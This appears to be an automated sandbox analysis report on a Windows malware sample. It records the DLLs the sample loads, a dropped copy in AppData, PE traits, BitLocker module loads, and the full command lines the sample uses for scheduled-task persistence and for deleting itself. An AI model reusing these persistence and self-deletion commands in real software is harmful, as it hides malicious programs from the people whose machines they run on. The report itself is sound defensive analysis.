Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: VQsnGWaNi5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VQsnGWaNi5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: VQsnGWaNi5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: KzwA.pdb source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr
Source:	Binary string: KzwA.pdbSHA256A source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr

Source: VQsnGWaNi5.exe

Static PE information: 0xE94E0121 [Wed Jan 13 06:43:45 2094 UTC]

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_070AA7F8 pushad ; iretd		0_2_070AA7F9
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07A2A7F8 pushad ; iretd		9_2_07A2A7F9

Source: VQsnGWaNi5.exe	Static PE information: section name: .text entropy: 7.496560990644054
Source: ywKvCTGbQjXP.exe.0.dr	Static PE information: section name: .text entropy: 7.496560990644054

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"			Jump to behavior

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
